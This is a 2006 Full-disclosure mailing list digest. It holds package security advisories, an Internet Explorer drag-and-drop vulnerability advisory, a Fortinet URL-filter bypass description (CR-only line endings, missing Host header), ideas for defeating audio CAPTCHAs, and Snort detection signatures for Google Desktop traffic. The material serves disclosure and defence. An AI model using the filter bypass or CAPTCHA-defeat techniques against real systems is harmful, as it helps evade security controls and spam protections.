Re: [Full-disclosure] On the "0-day" term

2006-02-13 Thread Jason Coombs

Steven M. Christey wrote:

One would hope that there is some critical mass (i.e. number of
compromised systems) beyond which any in-the-wild 0-day would become
publicly known.

We can't presume that all 0-day exploits will end up being widely 
observed and thus become well-known. This is not a valid presumption 
even if it ends up being true in practice, today.

The real challenge is for incident response forensics staff to equip 
themselves ahead of time with the necessary tools (and sources of 
forensic logs, including, for example, full packet capture logs of all 
network traffic within a rolling window time period that is as lengthy 
as possible) to be able to identify a 0-day exploit used as the source 
of entry for a one-off intrusion event.

Being able to detect, reliably, any changes made to configuration 
settings or on-disk and in-memory binaries altered by the intruder is 
good, too, but the capability to ascertain precisely what vulnerability 
got exploited to gain entry in the first place is critical to keeping 
the same well-prepared intruder out the second time around.

Some of the technical barriers to achieving full forensic awareness 
within the time period during which a relevant 0-day event occurred 
include the use of SSL and other encryption which bypasses simple packet 
capture logging (unless one's SSL engine also logs all session keys 
generated) and the processing power and storage space required to 
capture, store, and analyze such a large quantity of real-time and 
historical data. Not to mention the questionable probability that the 
log windows will be wide enough to contain useful information when an 
intrusion is finally noticed.

Dramatic improvements in this area of computer and network forensics 
would fundamentally alter modern information security. I do not see how 
any organization can believe itself to be adequately secured when the 
simple ability to prove security measures are working, and quickly 
determine the precise method of failure when they break down, 
essentially does not exist today.


Jason Coombs
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Re: [Full-disclosure] Internet Explorer drag&drop 0day

2006-02-13 Thread Markus

Hi Thierry Zoller,

I have a couple of problems/questions reguarding your web-site:
On the Secure-It details page [ ]
under the heading  "Do you have a demonstration ?", both links to the
demo "exploit" are dead.
   [ ]
   [ ]

My primary concern however is that the method chosen to open those links.
I assume in an attempt to hide the target url you meant to use the
* onclick * javascript event, or even the * onmousedown * or * onmouse * up,
but surely not the * onmouseover * !

You are aware that you current chosen method would have launched your
exploit on the machine of a prospective customer, without so much as a
clicks worth of their consent, had the links worked and by some small
miracle they had disabled pop-up blocking etc.

I do wish you the best of luck in your ventures.
Your products appear both useful and interesting.
Please give your web designer a whack on the side of the head though.


Gadi Evron wrote:

Dear Gadi Evron,

Just a note Users of Secure-it were already protected against this as
it blocks the shell.explorer interface since 2005:  [Freeware]

Cool. Thanks. That's the most polite and non-evasive commercial plug-in 
I've seen in a while! :)

I mean that!
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[Full-disclosure] On the "0-day" term

2006-02-13 Thread Steven M. Christey

In the "Internet Explorer drag&drop 0day" thread, Gadi Evron said:

>In my opinion, this comes to prove 0days are USUALLY a "myth" (WMF
>being a good example of a real 0day),

It's not necessarily that 0-days are a myth, it's that people have
been using the term "0-day" to mean two separate things:

 - in-the-wild hacks of live systems using vulnerabilities previously
   unkown to the public and the vendor;

 - release of exploit information for vulnerabilities previously
   unkown to the public and the vendor, for which there are no known
   in-the-wild hacks of live systems at the time of disclosure (though
   such hacks seem to occur very soon afterward)

>Does anyone still think bad guys don't exploit (to whatever goals) a
>0day if it is out there?

The answer seems obvious, but...

It's not entirely clear to me how many in-the-wild 0-days exist and
are actively exploited.  Just because some "white hat" finds something
does not mean that we should ALWAYS assume that the "black hats"
already know about it.  The converse is also true, of course; see the
recent WMF issue.

Certainly, at least a couple in-the-wild 0-days are publicized a year,
and maybe more in the coming year, given the precedents of the past 6
months or so, as the honeymonkeys project and Websense have shown.

One would hope that there is some critical mass (i.e. number of
compromised systems) beyond which any in-the-wild 0-day would become
publicly known.  This cricital mass would depend on the diligence of
the incident response community and the amount of coordination -
direct or indirect - with the vulnerability research community.

- Steve
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[Full-disclosure] [SECURITY] [DSA 970-1] New kronolith packages fix cross-site scripting

2006-02-13 Thread Martin Schulze
Hash: SHA1

- --
Debian Security Advisory DSA 970-1 [EMAIL PROTECTED] Martin Schulze
February 14th, 2006
- --

Package: kronolith
Vulnerability  : missing input sanitising
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2005-4189
Debian Bugs: 342943 349261

Johannes Greil of SEC Consult discovered several cross-site scripting
vulnerabilities in kronolith, the Horde calendar application.

The old stable distribution (woody) does not contain kronolith packages.

For the stable distribution (sarge) these problems have been fixed in
version 1.1.4-2sarge1.

For the unstable distribution (sid) these problems have been fixed in
version 2.0.6-1 of kronolith2.

We recommend that you upgrade your kronolith and kronolith2 packages.

Upgrade Instructions

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge

  Source archives:
  Size/MD5 checksum:  581 246f510d44a3a79fe88d9b6f0efc0cda
  Size/MD5 checksum:12005 c10a7d82b97300d62e6ef45f6e5e3cfe
  Size/MD5 checksum:   530945 8f5e5bca2a8b383e8a00fe19dacd138f

  Architecture independent components:
  Size/MD5 checksum:   528516 4d4ed7e51485ca96008175597612d72a

  These files will probably be moved into the stable distribution on
  its next update.

For apt-get: deb stable/updates main
For dpkg-ftp: 
Mailing list:
Package info: `apt-cache show ' and

Version: GnuPG v1.4.2 (GNU/Linux)


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[Full-disclosure] [ MDKSA-2006:039 ] - Updated gnutls packages fix libtasn1 out-of-bounds access vulnerabilities

2006-02-13 Thread security

Hash: SHA1

 Mandriva Linux Security Advisory MDKSA-2006:039
 Package : gnutls
 Date: February 13, 2006
 Affected: 10.1, 10.2, 2006.0
 Problem Description:
 Evgeny Legerov discovered cases of possible out-of-bounds access
 in the DER decoding schemes of libtasn1, when provided with invalid
 input.  This library is bundled with gnutls.
 The provided packages have been patched to correct these issues.

 Updated Packages:
 Mandriva Linux 10.1:
 854980401ea37c7ffc74837684dda112  10.1/RPMS/gnutls-1.0.13-1.2.101mdk.i586.rpm
 9df50e7e944f3ceb82428920e3bafe15  10.1/SRPMS/gnutls-1.0.13-1.2.101mdk.src.rpm

 Mandriva Linux 10.1/X86_64:

 Mandriva Linux 10.2:
 dd212f4fd56ded6d63c67e6d2f95ccec  10.2/RPMS/gnutls-1.0.23-2.2.102mdk.i586.rpm
 efb634eaa2e492a97d5a1c133ba203d0  10.2/SRPMS/gnutls-1.0.23-2.2.102mdk.src.rpm

 Mandriva Linux 10.2/X86_64:

 Mandriva Linux 2006.0:

 Mandriva Linux 2006.0/X86_64:

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver 0x22458A98

 You can view other update advisories for Mandriva Linux at:

 If you want to report vulnerabilities, please contact


 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
Version: GnuPG v1.2.4 (GNU/Linux)


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Re: [Full-disclosure] Latest wu-ftpd exploit :-s

2006-02-13 Thread John Smith

You're about 2 years too late.

Mark Heiligen wrote:
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[Full-disclosure] Advisory: Internet Explorer Drag and Drop Redeux [CVE-2005-3240] (fwd)

2006-02-13 Thread Matthew Murphy
Hash: RIPEMD160

My apologies to those who are receiving this late or are otherwise
inconvenienced by the staggered release.  I had unexpected, last-minute
travel issues that interfered somewhat with today's release.

Of note since the initial drafting of the advisory is that Microsoft has
released a blog post on the MSRC blog about the vulnerability report,
which can be read here:

The technical/strategic points about the exploit that are raised in the
post are indeed accurate (though it references MS05-014, when I believe
the correct reference is MS05-008/MS05-013).  The exploit has a greater
dependence on timing than previous, related attacks.  As such,
Microsoft's decision not to include this issue in a standalone patch is
seemingly justified at this point.  However, the point of disagreement
with Microsoft remains the choice of release *timeline*.

I released the information about this issue to a trusted colleague (Gadi
Evron) for publication today, after what I felt was a reasonable time,
in light of my difficulties obtaining internet access.

Though there are disagreements between myself and Microsoft about the
nature of this vulnerability, I would like to thank Brian Schafer of the
MSRC for adhering to a high level of professionalism and technical
accuracy in that post and for continuing to work with me once it was
made clear that the issue would imminently become public.

Also of note is that there was a typo in the information I provided
originally to SecuriTeam.  The proper candidate is CVE-2005-3240, not
*3840* as was originally reported by me.  SecurityFocus has also
informed me that my original BID reservation was a casualty of a data
migration and that the proper BID associated with this vulnerability is
now BID 16352, which is public in full detail as of this writing.

There have also been some incorrect reports made to SecuriTeam that this
issue does not affect Windows XP Service Pack 2.  These reports are not
correct -- my testing during this investigation was done exclusively on
current installations of Windows 2000 and Windows XP.  These systems had
all service packs applied and all updates installed when tests were

Thanks to Gadi Evron for doing some of my bidding today and taking some
of the heat for my fat-fingers.

The final advisory, corrected with the now-accurate references is
attached with an armored-format PGP signature inline.

- --
"Social Darwinism: Try to make something idiot-proof,
nature will provide you with a better idiot."

-- Michael Holstein

Version: GnuPG v1.4.2 (MingW32)

Microsoft Internet Explorer Drag-and-Drop Redeux


Affected Systems:
* Microsoft Internet Explorer 5.01
* Microsoft Internet Explorer 5.5
* Microsoft Internet Explorer 6.0
- Windows 98
- Windows 98 Second Edition
- Windows Millennium Edition
- Windows 2000
- Windows XP
- Windows Server 2003

Risk: Medium
Impact: Potential remote code execution with some user interaction
Status: Uncoordinated Release
Author: Matthew Murphy ([EMAIL PROTECTED])


Microsoft Internet Explorer suffers from a vulnerability in its handling of 
certain drag-and-drop events.  As a result, it is possible for a malicious web 
site to predict and exploit the timing of a drag-and-drop operation such that 
any drag operation (including using scroll-bars) could potentially lead to the 
installation of arbitrary files in sensitive locations that may enable further 
system compromise.


As a result of recent updates to its drag-and-drop functionality, Internet 
Explorer now imposes a rigid set of restrictions on most drag-and-drop sources:

* Input to the browser from other applications is not permitted.
* Dragging an object from inside a frame is not permitted.
* Dragging an HTML element from a top-level window will produce a 
security warning.

However, certain objects not derived from an HTML document (specifically, file 
objects within a folder view) remain draggable.  This gives rise to a potential 
race condition in the handling of user input.  If an attacker can persuade a 
user to drag any object within the top-level window that his/her site is 
contained in, malicious script can redirect these inputs to other top-level 
windows, potentially resulting in an unintended consequence such as file 

Proof-of-concept code has been developed that utilizes a pop-under window 
pointing to a malicious file share.  This window can be created using 

[Full-disclosure] Advisory: Internet Explorer Drag and Drop Redeux [CVE-2005-3240] (fwd)

2006-02-13 Thread Matthew Murphy
Hash: RIPEMD160

My apologies to those who are receiving this late or are otherwise
inconvenienced by the staggered release.  I had unexpected, last-minute
travel issues that interfered somewhat with today's release.

Of note since the initial drafting of the advisory is that Microsoft has
released a blog post on the MSRC blog about the vulnerability report,
which can be read here:

The technical/strategic points about the exploit that are raised in the
post are indeed accurate (though it references MS05-014, when I believe
the correct reference is MS05-008/MS05-013).  The exploit has a greater
dependence on timing than previous, related attacks.  As such,
Microsoft's decision not to include this issue in a standalone patch is
seemingly justified at this point.  However, the point of disagreement
with Microsoft remains the choice of release *timeline*.

I released the information about this issue to a trusted colleague (Gadi
Evron) for publication today, after what I felt was a reasonable time,
in light of my difficulties obtaining internet access.

Though there are disagreements between myself and Microsoft about the
nature of this vulnerability, I would like to thank Brian Schafer of the
MSRC for adhering to a high level of professionalism and technical
accuracy in that post and for continuing to work with me once it was
made clear that the issue would imminently become public.

Also of note is that there was a typo in the information I provided
originally to SecuriTeam.  The proper candidate is CVE-2005-3240, not
*3840* as was originally reported by me.  SecurityFocus has also
informed me that my original BID reservation was a casualty of a data
migration and that the proper BID associated with this vulnerability is
now BID 16352, which is public in full detail as of this writing.

There have also been some incorrect reports made to SecuriTeam that this
issue does not affect Windows XP Service Pack 2.  These reports are not
correct -- my testing during this investigation was done exclusively on
current installations of Windows 2000 and Windows XP.  These systems had
all service packs applied and all updates installed when tests were

Thanks to Gadi Evron for doing some of my bidding today and taking some
of the heat for my fat-fingers.

The final advisory, corrected with the now-accurate references is
attached with an armored-format PGP signature inline.

- --
"Social Darwinism: Try to make something idiot-proof,
nature will provide you with a better idiot."

-- Michael Holstein

Version: GnuPG v1.4.2 (MingW32)


Description: S/MIME Cryptographic Signature
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[Full-disclosure] defeating voice captchas

2006-02-13 Thread Gadi Evron
One of the newest (now known though) tricks in the Captcha book is using 

If users cannot understand what the letters are in the now too-complex 
Captchas that are forced on us due to spammer counter-measures at 
defeating Captchas, he or she can click on an icon and listen to it. :)

Here is the earliest example of it that I know of:

That example is a bit amateurish, as the recording is bad and obviously 
not done by a girl with a sexy voice. Still, the disturbance from the 
bad Microphone can be eliminated or kept entirely. It doesn’t matter.

In this case each letter is played by itself. Further, each letter was 
recorded only once.

Therefore, how many times does one have to refresh the page and listen 
to the Captcha to be able to simply learn to identify the Captcha by 
say, an MD5 hash of the audio for each letter?

Even if it was all set in one audio file, and even if the audio was 
played with to be, as an example, in a higher pitch. Or perhaps even if 
several different voices would greet us…
Looking at general similarities in the audio file itself would be enough 
to break down this Captcha once enough harvesting attempts (not that 
many really) were saved.

Auto-generated voice? That sounds easy to beat but I am not an audio 
expert so, “sounds like” will stay as my opinion.

It’s is great to be able to finally understand these new annoying 
Captchas, but already we are getting to a point where one can’t 
understand the recorded speech either due to counter-measures from the 
spammers and the Captchas becoming more and more difficult.

For information on breaking regular text-image Captchas, check:

For my post on new comment spam problems:

This text can be found here:

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[Full-disclosure] [ GLSA 200602-06 ] ImageMagick: Format string vulnerability

2006-02-13 Thread Thierry Carrez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200602-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: ImageMagick: Format string vulnerability
  Date: February 13, 2006
  Bugs: #83542
ID: 200602-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


A vulnerability in ImageMagick allows attackers to crash the
application and potentially execute arbitrary code.


ImageMagick is an application suite to manipulate and convert images.
It is often used as a utility backend by web applications like forums,
content management systems or picture galleries.

Affected packages

 Package/  Vulnerable  /Unaffected
  1  media-gfx/imagemagick  <   >=


The SetImageInfo function was found vulnerable to a format string
mishandling. Daniel Kobras discovered that the handling of "%"-escaped
sequences in filenames passed to the function is inadequate. This is a
new vulnerability that is not addressed by GLSA 200503-11.


By feeding specially crafted file names to ImageMagick, an attacker can
crash the program and possibly execute arbitrary code with the
privileges of the user running ImageMagick.


There is no known workaround at this time.


All ImageMagick users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-gfx/imagemagick-"


  [ 1 ] CVE-2006-0082
  [ 2 ] GLSA 200503-11


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:


Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at


Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

Description: OpenPGP digital signature
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RE: [Full-disclosure] Comment Spam: new trends, failing counter-measures and why it's a big deal

2006-02-13 Thread php0t
> might be a good place to start.  pwntcha is supposedly quite

  Thanks for the tip. Shame on me for not clicking the Wikipedia link
last time.
I will comment on the links I found worth while.

Different subject: it explains how to defeat poor implementations of it
that don't get rid of the session.

Gonna look into it, seems promising in the aspect of letting me supply
an image of my choice.

(quote) "Q. Please give me a copy of PWNtcha so that I can test it on my
own CAPTCHA and see how efficient it is! 
A. PWNtcha does not work that way. It is not an intelligent program that
tries to decode a random CAPTCHA. Such a program would be nearly
impossible to do. PWNtcha is simply a toolkit of image manipulation
functions, and a list of known CAPTCHAs with the associated list of
image operations to apply in order to decode each of them. If I have
never seen your CAPTCHA, then PWNtcha does not know about it, and there
is absolutely no way it could decode it."

  I've been saying from the start that I'm aware of the fact that there
are *some* programs that can defeat *some* captchas, just like this one.
Also, it doesn't offer what (2) did, probably because of the quote
  Still, it's a page that is quite useful: it explains the weaknesses of
the certain implementations.
  I guess we can all learn from all these, some examples:

1) destroy the session when not needed any more
2) change the picture on a wrong attempt
3) take measures against 'brute force'
4) don't use constant parts (font, background, colors)
5) use rotation, deformation, maybe letters in 3D (adding extra edges
6) layer more words on each other
7) if you sense too much spam, change a few things
  I probably left out a lot of things that should be considered, so
additional ideas are very welcome.


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Re: [Full-disclosure] blocking Google Desktop

2006-02-13 Thread Michael Holstein
I am using Google desktop version 4. By default search across computers 
is not enabled. Can someone explain me why all the noise if I just don't 
use the feature.

True, it's not enabled by default, but Google is pitching this as an 
easy way to access your work documents from home (or vise-versa) .. and 
*that* is a serious security risk.

In the corporate world, users don't get to make their own choices. 
Management makes them, and it's the IT department's job to enforce that 
-- against the user's will kicking and screaming, if necessary.

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Re: [Full-disclosure] blocking Google Desktop

2006-02-13 Thread Valdis . Kletnieks
On Mon, 13 Feb 2006 23:38:41 +0530, Prabhat Sharma said:

> I am using Google desktop version 4. By default search across computers is
> not enabled. Can someone explain me why all the noise if I just don't use
> the feature.

The noise is because many of us have dozens, or hundreds, or thousands of
users we're responsible for, who *will* enable it because it looks cool, not
realizing the security implications.  A significant fraction will enable it
Just Because, even though they then never actually *use* the functionality

Description: PGP signature
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Re: [Full-disclosure] blocking Google Desktop

2006-02-13 Thread Prabhat Sharma
I am using Google desktop version 4. By default search across computers is not enabled. Can someone explain me why all the noise if I just don't use the feature.I believe that educating the users is the best way to safeguard against issues like this. As my understanding says most of the incidents take place, not because of technical superiority of the attacker (virus)(It applies to issues like GDS as well) but because of social engineering or insufficient due diligence from user's part.
PS: No offense to anyone. If what I am thinking is wrong kindly correct me.
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Re: [Full-disclosure] blocking Google Desktop

2006-02-13 Thread Michael Holstein
First, I made a mistake in the version number. The current/new one is 
version 3 (the one that uploads your data to Google)

I've been experimenting with Snort sigs to detect this.

Google Desktop uses a unique user-agent (I got a tip about this from 
another user at full-disclosure -- thanks Charles!) :

User-Agent: Mozilla/4.0 (compatible; Google Desktop)

So here is a snort sig for that ...

alert tcp $HOME_NET any -> $EXTERNAL_NET 80 (msg: "BLEEDING-EDGE Google 
Desktop User-Agent Detected"; flow: to_server,established; 
content:"User-Agent\: Mozilla/4.0 (compatible\; Google Desktop)"; 
nocase; classtype: policy-violation; sid: 301; rev:1; )

That sig would at least let you know who's using it, but blocking that 
traffic wouldn't do anything except prevent the RSS feeds (news, 
weather, etc) from loading.

Now, for the file-specific stuff, since that's all done over SSL to :

Upon examining the SSL/TLS session setup, I wrote this one to flag the 
certificate Google is using (from Thwarte). This will probably change 
when they change/renew their certificates.

alert tcp $EXTERNAL_NET 443 -> $HOME_NET 1024:65535 (msg: "BLEEDING-EDGE 
Google SSL key exchange"; flow: from_server,established; content:"|30 36 
30 36 30 37 32 32 31 32 35 34 5A 30 68 31|"; rawbytes; content:"|77 77 
77 2E 67 6F 6F 67 6C 65 2E 63 6F 6D|"; rawbytes; 
classtype:policy-violation; sid: 302; rev:1; )

Note that this also flags logons to gmail.

The fetches with the "Google Desktop" user-agent happen first when the 
application is started -- then you get the SSL setup for any new data to 
be uploaded to Google's servers.

Unfortunately, the dynamic/activate stuff in snort dosen't let you do an 
"alert" action after an activate -- because it's designed to just dump 
the next (n) packets. If there was a good way to chain the two rules 
together -- to say "after seeing 1, do REACT on #2" you could reliably 
kill any SSL/TLS sessions from somebody running Google Desktop, thus 
preventing the upload of anything.


Michael Holstein CISSP GCIA
Cleveland State University
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RE: [Full-disclosure] Comment Spam: new trends, failing counter-measures and why it's a big deal

2006-02-13 Thread php0t
> > the global solution against word recognition based challenges? If it

> > was like that, it would mean that there is no way anybody could make

> > an image generator that would change its success rate from 90% to 
> > 0%...

> It's *really* *really* difficult to produce a graphic image of letters
and numbers that is still recognizable to a human but can't 
> be beaten by a good edge-detection algorithm.  For instance, you can
"bleed" the edges so that they're fuzzy - but then the 
> human has a hard time telling if it's an 'i' or an 'l', or an 'h' or a
'b' (and so on).

  This is kind of like the problem that you have when you get a
confirmation code in SMS, and you can't tell between I's and l's etc
thanks to your mobile phone's display. But that doesn't mean the problem
is about verifying the person via SMS. They just need to filter / change
some letters used to make it a little more obvious (and maybe balance it
with longer strings).

What you're saying sounds nice, but I ask again - both of you - to post
some links to some of these high success rate AI bots (preferably php's)
with that algo you say is hard to beat.

  I'm certainly interested in this, because all this time I thought that
even if there were *some* applications that could defeat *some*
challenges, the Turing test was still up to the current times, but what
you're telling me totally contradicts that.
Since you both mentioned these things as certain existing facts, it
would be nice to get a reference to a URL (preferably more) so people
could just look at it (them) and try for themselves (and naturally play
around with them until they beat it - you say it's *very very* hard, I
say I have yet to see it - even if it's hard, it'd be worth my time to
experiment with it, others will probably agree who think this subject is
interesting). Yes, I googled, I didn't get 

> I suppose you *could* put up a picture of something, and ask "What is
this a picture of" - but then you need a sufficiently 
> large library of images that an attacker can't just download all of
them and have a human name each one once. And of 
> course, this has the danger that a user can be left saying: "WTF? Is
that an antelope or a gazelle?"

  You're right, I don't like the idea of having a database of all the
possible answers, and the antelope/gazelle thing certainly got me pissed
on the captcha site. When I tested it, first it was a couple of bugs (I
didn't find neither insect, neither bug in the list), then it was
umbrellas with an exception picture - it was more like a pain in the
ass, a computer would have better luck by going through the option list

  Eagerly waiting for examples,

Ps: these are what I found on google about the subject. They're nice,
but 1) they contain no code / tryout option, and some of them only focus
on solving certain captchas. (as I previously said, *some* apps, *some*

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[Full-disclosure] BackTrack developer edition

2006-02-13 Thread Fabrice Ndjidie
Hi all,Does anyone has a link for downloading the "BackTrack developer edition" ?Best regards.-- 
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Re: [Full-disclosure] Need some advice for a new customer

2006-02-13 Thread Peter Besenbruch

Here's the question:

Should the company notify their customers of a POSSIBLE compromise of their
data? I have been trying to convince them that they should operate as though
the data is compromised. Is that the right position to take as a security

What would be the consequence to their business be if the news of 
compromise came from a third party, and not the business itself? They 
need to get out front on this.

Hawaiian Astronomical Society:
HAS Deepsky Atlas:
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Re: [Full-disclosure] Internet Explorer drag&drop 0day

2006-02-13 Thread Valdis . Kletnieks
On Mon, 13 Feb 2006 09:05:47 EST, Shyaam said:

> I am looking for ebooks and dumps for the Security Certified Network
> Professional and the Security Certified Network Associate. Kindly please do
> send any resources to my personal email or the group so that it would be
> helpful for everyone who are taking that cert.

The e-books are almost certainly copyrighted, and somebody is likely
expecting to be paid for them.  Keep that in mind as you pursue this
white-hat cert. ;)

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Re: [Full-disclosure] Comment Spam: new trends, failing counter-measures and why it's a big deal

2006-02-13 Thread Valdis . Kletnieks
On Mon, 13 Feb 2006 07:09:48 +0100, php0t said:

> the global solution against word recognition based challenges? If it was
> like that, it would mean that there is no way anybody could make an
> image generator that would change its success rate from 90% to 0%...

It's *really* *really* difficult to produce a graphic image of letters
and numbers that is still recognizable to a human but can't be beaten by
a good edge-detection algorithm.  For instance, you can "bleed" the edges
so that they're fuzzy - but then the human has a hard time telling if
it's an 'i' or an 'l', or an 'h' or a 'b' (and so on).

I suppose you *could* put up a picture of something, and ask "What is this
a picture of" - but then you need a sufficiently large library of images that
an attacker can't just download all of them and have a human name each one once.
And of course, this has the danger that a user can be left saying: "WTF? Is
that an antelope or a gazelle?"

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[Full-disclosure] Need some advice for a new customer

2006-02-13 Thread Red Leg
Hi all.

I have recently acquired a new customer who had a new version (dropped a new
exe file - one that hasn't been seen before they were infected - in the
system32 sub-directory) the sdbot worm blow through every machine on their
network. The worm is definitely one of the sdbot.worm.gen variants. And,
yes, the computer that held their customer credit card info was definitely
infected. The I.T. People at this firm failed to patch, or even have a plan
to patch the Windows OS.

Here's the question:

Should the company notify their customers of a POSSIBLE compromise of their
data? I have been trying to convince them that they should operate as though
the data is compromised. Is that the right position to take as a security

Thanks for your advice and time to think about this.


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Re: [Full-disclosure] Internet Explorer drag&drop 0day

2006-02-13 Thread Gadi Evron

Thierry Zoller wrote:

Dear Gadi Evron,

Just a note Users of Secure-it were already protected against this as
it blocks the shell.explorer interface since 2005:  [Freeware]

Cool. Thanks. That's the most polite and non-evasive commercial plug-in 
I've seen in a while! :)

I mean that!
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Re: [Full-disclosure] Internet Explorer drag&drop 0day

2006-02-13 Thread Shyaam
Dear All,
I am looking for ebooks and dumps for the Security Certified Network Professional and the Security Certified Network Associate. Kindly please do send any resources to my personal email or the group so that it would be helpful for everyone who are taking that cert.

Thank you so much. Your help is appreciated.
Kind Regards,
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Re: [Full-disclosure] Internet Explorer drag&drop 0day

2006-02-13 Thread Thierry Zoller
Dear Gadi Evron,

Just a note Users of Secure-it were already protected against this as
it blocks the shell.explorer interface since 2005:  [Freeware]

Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7

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[Full-disclosure] Internet Explorer drag&drop 0day

2006-02-13 Thread Gadi Evron

Matthew Murphy has just disclosed a vulnerability in Internet Explorer.

He will send his advisory later today, but as he is unable to right now, 
he asked me to email this for him.
[I didn't want to email the advisory itself as ALL CREDIT BELONGS TO HIM 
and I didn't want to take the credit away from him in any way. This is 
100% his work and his disclosure]

Microsoft decided to patch this only next year with SP3. As by now 6 
mounths passed since Microsoft was contacted, Matthew alerted them ahead 
of time he will make a public release on the 13th (today).

There have been several attempts to help Matthew and talk to Microsoft 
(including by me, as well as several others) and convince them this is 
indeed “bullet-in worthy” to avoid this public release.

This is not a critical vulnerability, as it requires user interaction. 
However, it is serious and shouldn’t be down-played.

Here are some interesting ways to exploit this using social engineering:
Scroll-bar, “smack the monkey”, moving naked girl (move mouse to make 
me...), web game, shopping list/wish list, “calibrate your mouse”, etc.

The advisory (and suggested work-around) can be found here:

In my opinion, this comes to prove 0days are USUALLY a "myth" (WMF being 
a good example of a real 0day), as this particular vulnerability has 
been known to me and some others for some time now awaiting public release.
Does anyone still think bad guys don't exploit (to whatever goals) a 
0day if it is out there?

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[Full-disclosure] working of winpcap

2006-02-13 Thread yogesh choubey
Hi Aditya,
i am yogesh , want to know more about winpcap.
how it works?still after reading from site winpcap ,i
am not able to get depper in it.please helpme by
providing some document.
Thanks & Regards
Yogesh Kumar 

Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
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[Full-disclosure] Latest wu-ftpd exploit :-s

2006-02-13 Thread Mark Heiligen
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[Full-disclosure] Re: blocking Google Desktop

2006-02-13 Thread mamo
On 2/11/06, Randall M <[EMAIL PROTECTED]> wrote:
> You keep saying version 4, but we are at 3. The above just places google in
> the low in file swaping realm. This scares me for security reasons.

Sorry... but the latest version I can download from the web site is version 2. Am I missing something or
did they removed the new version from the website?

Best Regards.
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[Full-disclosure] [SECURITY] [DSA 969-1] New scponly packages fix potential root vulnerability

2006-02-13 Thread Martin Schulze
Hash: SHA1

- --
Debian Security Advisory DSA 969-1 [EMAIL PROTECTED] Martin Schulze
February 13th, 2006
- --

Package: scponly
Vulnerability  : design error
Problem type   : local
Debian-specific: no
CVE ID : CVE-2005-4532
Debian Bug : 344418

Max Vozeller discovered a vulnerability in scponly, a utility to
restrict user commands to scp and sftp, that could lead to the
execution of arbitray commands as root.  The system is only vulnerable
if the program scponlyc is installed setuid root and if regular users
have shell access to the machine.

The old stable distribution (woody) does not contain an scponly package.

For the stable distribution (sarge) this problem has been fixed in
version 4.0-1sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 4.6-1.

We recommend that you upgrade your scponly package.

Upgrade Instructions

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge

  Source archives:
  Size/MD5 checksum:  600 ef0e45e07cfdd80fd53c0d3cd3daa31e
  Size/MD5 checksum:27012 96ee81daa1b248fe679106a9d9986b1b
  Size/MD5 checksum:85053 1706732945996865ed0cccd440b64fc1

  Alpha architecture:
  Size/MD5 checksum:31270 662c573abf24bf1094e939b89acd5575

  AMD64 architecture:
  Size/MD5 checksum:30254 5db48bd53f0ca4fea76091221ceee6ac

  ARM architecture:
  Size/MD5 checksum:29046 95081c9ab7115b06f4b370bf8ecadae6

  Intel IA-32 architecture:
  Size/MD5 checksum:29356 1f2e8799c3c018c17734665f2610bef2

  Intel IA-64 architecture:
  Size/MD5 checksum:33144 887025e1e4ff759edd4f69005c6c2b3b

  HP Precision architecture:
  Size/MD5 checksum:30262 f721669ee692a8b21d975912a0a67f56

  Motorola 680x0 architecture:
  Size/MD5 checksum:29002 e7d63e25636483f8437b57d897fcd1b3

  Big endian MIPS architecture:
  Size/MD5 checksum:38582 995a79aab6d2ed7ab4bc37b921462a9e

  Little endian MIPS architecture:
  Size/MD5 checksum:38564 95bbff4502021a1a53f45c014fca20e2

  PowerPC architecture:
  Size/MD5 checksum:29702 60138f788f40ba7ffc35de22f7bb39cc

  IBM S/390 architecture:
  Size/MD5 checksum:30060 340a4ed4effca8e9e27643789ea300c9

  Sun Sparc architecture:
  Size/MD5 checksum:29302 404579837618ae530847774aab4227a3

  These files will probably be moved into the stable distribution on
  its next update.

For apt-get: deb stable/updates main
For dpkg-ftp: 
Mailing list:
Package info: `apt-cache show ' and

Version: GnuPG v1.4.2 (GNU/Linux)


[Full-disclosure] URL filter bypass in Fortinet

2006-02-13 Thread Mathieu Dessus
URL filter bypass in Fortinet

Severity:  Low
Impact:Bypass Fortinet web filter
Vulnerabilty type: Design error
Affected products: FortiGate v2.8
CVE reference: CAN-2005-3058

Vulnerability Description:

It is possible to bypass Fortinet URL blocker by making special HTTP requests:
- if each line of the request is terminated by CR instead of CRLF
- if there's no host field in HTTP/1.0 request

Theses request are "tolerated" by the HTTP RFC 2616, par. 19.3, and most of
the web servers replyes to them, however, Fortinet failed to parse such URLs.

This bug was tested on FortiOS v2.8MR10 and v3beta.
The IPS module is not affected by this vulnerabylity.


See the perl scrip below.


No solution available yet.

Vendor Response:

08/11/2005 The vendor was contacted (using support web site), and a
perl script for reproducting the problem was provided
08/16/2005 The vendor asked for more information
08/18/2005 Network dumps and explanations sent to the vendor
